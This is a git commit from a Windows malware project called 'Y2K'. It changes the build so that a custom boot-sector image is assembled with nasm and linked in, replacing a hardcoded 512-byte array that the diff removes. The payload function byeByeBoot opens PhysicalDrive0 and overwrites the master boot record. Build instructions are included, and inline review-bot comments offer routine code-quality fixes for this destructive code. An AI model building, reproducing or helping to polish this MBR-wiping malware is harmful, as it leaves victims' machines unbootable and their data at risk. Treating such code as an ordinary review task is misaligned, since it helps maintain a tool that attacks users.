Add dynamic bootloader compilation
This commit is contained in:
parent
0b4cc4f6b6
commit
51b7464f02
|
@ -1,4 +1,5 @@
|
|||
bin/
|
||||
bin/*.exe
|
||||
res/*.o
|
||||
bootloader/*.bin
|
||||
mbr/*.bin
|
||||
mbr/*.o
|
||||
|
|
8
Makefile
8
Makefile
|
@ -1,6 +1,8 @@
|
|||
.PHONY: all clean
|
||||
|
||||
CXX := i686-w64-mingw32-g++
|
||||
LD := i686-w64-mingw32-ld
|
||||
NASM := nasm
|
||||
WINDRES := i686-w64-mingw32-windres
|
||||
|
||||
SRC := $(wildcard src/*)
|
||||
|
@ -10,8 +12,10 @@ all: main
|
|||
main: $(BIN)
|
||||
@mkdir -p bin
|
||||
$(WINDRES) -o res/resource.o res/resource.rc
|
||||
$(CXX) $(SRC) res/resource.o -static -l gdi32 -l winmm -o bin/Y2K
|
||||
$(NASM) -o mbr/bootloader.bin mbr/bootloader.asm
|
||||
$(LD) -r -b binary -o mbr/bootloader.o mbr/bootloader.bin
|
||||
$(CXX) $(SRC) res/resource.o mbr/bootloader.o -static -l gdi32 -l winmm -o bin/Y2K
|
||||
|
||||
clean:
|
||||
@echo "Cleaning up..."
|
||||
@rm -fr bin/* res/*.o bootloader/*.bin
|
||||
@rm -fr bin/* res/*.o mbr/*.bin mbr/*.o
|
||||
|
|
18
README.org
18
README.org
|
@ -11,38 +11,42 @@ To run this malware you need a Windows XP macchine with date set to <2000-01-01>
|
|||
You will need *MinGW* and *Make*. You can parse the
|
||||
argument =CXX= to change the C++ compiler (the default is ~i686-w64-mingw-g++~) and
|
||||
the =WINDRES= to change the default ~windres~ command (the default is ~i686-w64-mingw-windres~).
|
||||
You can change the =CXX= and =WINDRES= to ~x86_64-wi64-mingw-g++~ and ~x86_64-wi64-mingw-windres~ respectively to build it natively for 64bit envioriments.
|
||||
Others arguments are =NASM= and =LD= for changing the nasm and ld commands.
|
||||
You can change the =CXX= and =WINDRES= and =LD= to ~x86_64-w64-mingw-g++~ and ~x86_64-w64-mingw-windres~ and ~x86_64-w64-mingw32-ld~ respectively to build it natively for 64bit envioriments.
|
||||
|
||||
*** Arch linux:
|
||||
|
||||
#+BEGIN_SRC shell
|
||||
pacman -S mingw-w64 make
|
||||
pacman -S make mingw-w64 nasm
|
||||
make
|
||||
#+END_SRC
|
||||
|
||||
*** Ubuntu
|
||||
|
||||
#+BEGIN_SRC shell
|
||||
apt install mingw-w64 make
|
||||
apt install make mingw-w64 nasm
|
||||
make
|
||||
#+END_SRC
|
||||
|
||||
|
||||
You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= files on folder =bootloader/=.
|
||||
You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= and =.o= files on folder =mbr/=.
|
||||
|
||||
** On Windows
|
||||
|
||||
You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler.
|
||||
You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler
|
||||
and [[https://nasm.us/][NASM]].
|
||||
Then run the command:
|
||||
|
||||
#+BEGIN_SRC batch
|
||||
windres -o res\resource.o res\resource.rc
|
||||
g++ src\* res\resource.o -static -l gdi32 -l winmm -o Y2K
|
||||
nasm -o mbr\bootloader.bin mbr\bootloader.asm
|
||||
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
|
||||
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
|
||||
#+END_SRC
|
||||
|
||||
* Bootloader
|
||||
|
||||
This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code and building instructions for the binaies can be found [[src/bootloader/][here]].
|
||||
This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found [[src/mbr/][here]].
|
||||
|
||||
* Payloads
|
||||
|
||||
|
|
|
@ -2,6 +2,5 @@
|
|||
|
||||
This is the bootloader source code of Y2K. to build run ~nasm bootloader.asm -o bootloader.bin~
|
||||
|
||||
You can execute the ~python getHex.py bootloader.bin~ to get the formated bootloader bytes plus
|
||||
the size of the generated array and put it in the bootloader contant in =src/payloads.h= alongside
|
||||
with the printed size.
|
||||
You need to execute ~ld -r -b binary -o bootloader.o bootloader.bin~ to create the object file used to
|
||||
compile the code.
|
||||
|
|
|
@ -120,8 +120,8 @@ eternal:
|
|||
|
||||
|
||||
; Set cursor position
|
||||
; dl - Columns - x
|
||||
; dh - Rows - y
|
||||
; dl Columns x
|
||||
; dh Rows y
|
||||
cursor:
|
||||
cli
|
||||
mov ah, 0x2
|
||||
|
@ -130,7 +130,7 @@ cursor:
|
|||
ret
|
||||
|
||||
; Print some gay string
|
||||
; si - string
|
||||
; si string
|
||||
print:
|
||||
cli
|
||||
mov bl, 0x21
|
||||
|
@ -144,7 +144,7 @@ print:
|
|||
ret
|
||||
|
||||
; Delay
|
||||
; cx - delay value in microsseconds
|
||||
; cx delay value in microsseconds
|
||||
sleep:
|
||||
cli
|
||||
mov ah, 0x86
|
||||
|
@ -162,5 +162,5 @@ easter3 db "I really hate this mbr payload.", 0
|
|||
easter4 db "You're very gay. B)", 0
|
||||
|
||||
|
||||
times 510 - ($-$$) db 0 ; Fill the file with 0 510 times'
|
||||
times 510 - ($-$$) db 0 ; Fill the file with 0 510 times
|
||||
dw 0xAA55 ; Magic number used by BIOS to identify the file
|
||||
|
|
|
@ -1,30 +0,0 @@
|
|||
from sys import argv, exit as exitc
|
||||
|
||||
if len(argv) > 2:
|
||||
print('Please inform just one file!')
|
||||
exitc(2)
|
||||
|
||||
elif len(argv) != 2:
|
||||
print('Plase inform a file!')
|
||||
exitc(3)
|
||||
|
||||
try:
|
||||
file = open(argv[1], 'rb')
|
||||
|
||||
except FileNotFoundError:
|
||||
print('The specified file was not found!')
|
||||
exitc(4)
|
||||
|
||||
content = file.read()
|
||||
file.close()
|
||||
|
||||
for i in range(len(content)):
|
||||
if i%12 == 0:
|
||||
print('')
|
||||
|
||||
print(format(content[i], '#04x'), end='')
|
||||
|
||||
if i != len(content)-1:
|
||||
print(', ', end='')
|
||||
|
||||
print('\nSize:', len(content))
|
|
@ -2,6 +2,9 @@
|
|||
#include "payloads.h"
|
||||
#include "bytebeats.h"
|
||||
|
||||
extern char binary_mbr_bootloader_bin_start[];
|
||||
extern char binary_mbr_bootloader_bin_end[];
|
||||
|
||||
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
|
||||
|
||||
HANDLE t1, t2, t3, t4;
|
||||
|
@ -19,7 +22,11 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
|
|||
PlaySound(MAKEINTRESOURCE(2), hInstance, SND_RESOURCE);
|
||||
ExitProcess(0);
|
||||
case 2:
|
||||
Payloads::byeByeBoot();
|
||||
Payloads::byeByeBoot((unsigned int)
|
||||
(binary_mbr_bootloader_bin_end -
|
||||
binary_mbr_bootloader_bin_start),
|
||||
binary_mbr_bootloader_bin_start,
|
||||
binary_mbr_bootloader_bin_end);
|
||||
break;
|
||||
case 3:
|
||||
ExitProcess(0);
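Review bot: The new call casts the pointer difference to `unsigned int`, but the callee as declared in the payloads hunk is `void byeByeBoot(int size,char* start,char* end)`, so the value is immediately converted back to signed `int` and the cast documents nothing; the two sides should agree on one type, for example by changing the cast to `(int)` or the parameter to `unsigned int`. The same mismatch is on the signature line of the payloads hunk. The relationship between the three arguments is also only implicit here; a one-line comment above the two `extern` declarations, `// start/end bracket the image linked in by ld -r -b binary; the size passed below is end - start`, would make the contract visible at the call site. WinMain's body continues outside the hunk.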
|
||||
|
|
|
@ -47,57 +47,22 @@ namespace Payloads {
|
|||
return 3;
|
||||
}
|
||||
|
||||
void byeByeBoot(){
|
||||
const unsigned char bootloader[512] = {
|
||||
0xFA, 0x68, 0x00, 0xA0, 0x07, 0x31, 0xFF, 0xB8, 0x13, 0x00, 0xCD, 0x10,
|
||||
0xB9, 0x15, 0x00, 0xE8, 0xB8, 0x00, 0xBE, 0xD3, 0x7C, 0xB2, 0x0C, 0xB6,
|
||||
0x0A, 0xE8, 0x97, 0x00, 0xE8, 0x9C, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0xA5,
|
||||
0x00, 0xBE, 0xE3, 0x7C, 0xB2, 0x06, 0xB6, 0x0C, 0xE8, 0x84, 0x00, 0xE8,
|
||||
0x89, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0x92, 0x00, 0x30, 0xD2, 0x30, 0xF6,
|
||||
0xE8, 0x74, 0x00, 0xBE, 0x01, 0x7D, 0xB3, 0x07, 0xB4, 0x0E, 0xAC, 0xCD,
|
||||
0x10, 0x08, 0xC0, 0x75, 0xF7, 0x80, 0xC2, 0x10, 0xE8, 0x60, 0x00, 0x30,
|
||||
0xE4, 0xCD, 0x16, 0x3C, 0x08, 0x74, 0x34, 0x3C, 0x0D, 0x74, 0x27, 0x80,
|
||||
0xFA, 0x27, 0x7D, 0x22, 0x3C, 0x1B, 0x74, 0x2E, 0x3C, 0x36, 0x74, 0x2F,
|
||||
0x3C, 0x39, 0x74, 0x30, 0x3C, 0x09, 0x74, 0x31, 0xB4, 0x0A, 0x30, 0xFF,
|
||||
0xB3, 0x0F, 0xB9, 0x01, 0x00, 0xCD, 0x10, 0xFE, 0xC2, 0xE8, 0x2F, 0x00,
|
||||
0xEB, 0xCD, 0x30, 0xD2, 0xFE, 0xC6, 0xE8, 0x26, 0x00, 0xEB, 0xC4, 0xFE,
|
||||
0xCA, 0xE8, 0x1F, 0x00, 0xEB, 0xBD, 0xBE, 0x12, 0x7D, 0xEB, 0x0D, 0xBE,
|
||||
0x2D, 0x7D, 0xEB, 0x08, 0xBE, 0x48, 0x7D, 0xEB, 0x03, 0xBE, 0x68, 0x7D,
|
||||
0x30, 0xD2, 0x30, 0xF6, 0xE8, 0x04, 0x00, 0xE8, 0x09, 0x00, 0xF4, 0xFA,
|
||||
0xB4, 0x02, 0xB7, 0x00, 0xCD, 0x10, 0xC3, 0xFA, 0xB3, 0x21, 0xB4, 0x0E,
|
||||
0xAC, 0xFE, 0xC3, 0xCD, 0x10, 0x08, 0xC0, 0x75, 0xF5, 0xC3, 0xFA, 0xB4,
|
||||
0x86, 0xBA, 0x00, 0x00, 0xCD, 0x15, 0xC3, 0x48, 0x61, 0x70, 0x70, 0x79,
|
||||
0x20, 0x6E, 0x65, 0x77, 0x20, 0x59, 0x65, 0x61, 0x72, 0x21, 0x00, 0x45,
|
||||
0x6E, 0x6A, 0x6F, 0x79, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x75, 0x73,
|
||||
0x65, 0x6C, 0x65, 0x73, 0x73, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61,
|
||||
0x64, 0x2E, 0x2E, 0x2E, 0x00, 0x54, 0x79, 0x70, 0x65, 0x20, 0x73, 0x6F,
|
||||
0x6D, 0x65, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x3A, 0x20, 0x00, 0x59, 0x6F,
|
||||
0x75, 0x20, 0x66, 0x69, 0x6E, 0x64, 0x20, 0x61, 0x20, 0x45, 0x61, 0x73,
|
||||
0x74, 0x65, 0x72, 0x45, 0x67, 0x67, 0x2C, 0x20, 0x4F, 0x4D, 0x47, 0x21,
|
||||
0x00, 0x54, 0x68, 0x69, 0x73, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x69,
|
||||
0x73, 0x20, 0x73, 0x6F, 0x20, 0x62, 0x75, 0x67, 0x67, 0x79, 0x2E, 0x20,
|
||||
0x3E, 0x3A, 0x43, 0x00, 0x49, 0x20, 0x72, 0x65, 0x61, 0x6C, 0x6C, 0x79,
|
||||
0x20, 0x68, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6D,
|
||||
0x62, 0x72, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x00,
|
||||
0x59, 0x6F, 0x75, 0x27, 0x72, 0x65, 0x20, 0x76, 0x65, 0x72, 0x79, 0x20,
|
||||
0x67, 0x61, 0x79, 0x2E, 0x20, 0x42, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
|
||||
};
|
||||
void byeByeBoot(int size,char* start,char* end){
|
||||
unsigned char bootloader[size];
|
||||
int index = 0;
|
||||
for(char* i = start; i != end; ++i) {
|
||||
bootloader[index] = *i;
|
||||
index++;
|
||||
}
|
||||
|
||||
DWORD bWriten;
|
||||
|
||||
HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"), GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
|
||||
WriteFile(mbr, bootloader, 512, &bWriten, NULL);
|
||||
HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"),
|
||||
GENERIC_ALL,
|
||||
FILE_SHARE_READ | FILE_SHARE_WRITE,
|
||||
0, OPEN_EXISTING, 0, 0);
|
||||
|
||||
WriteFile(mbr, bootloader, size, &bWriten, NULL);
|
||||
CloseHandle(mbr);
|
||||
}
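Review bot: `unsigned char bootloader[size];` on the second line of the new body is a variable-length array, which is a GNU extension in C++ rather than standard C++, so this function now compiles only with compilers that accept it. The signature also states one fact twice: `size` is by construction `end - start`, and `end` is used only as the loop bound, so a caller that changes one argument without the other desynchronises the copy loop from the later `WriteFile` length with no diagnostic. I would record that invariant on the signature, `// Precondition: size == end - start; both pointers refer to the linker-embedded image`, so the coupling is explicit to the next maintainer. The enclosing `namespace Payloads` opens outside the hunk.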
|
||||
|
||||
|
|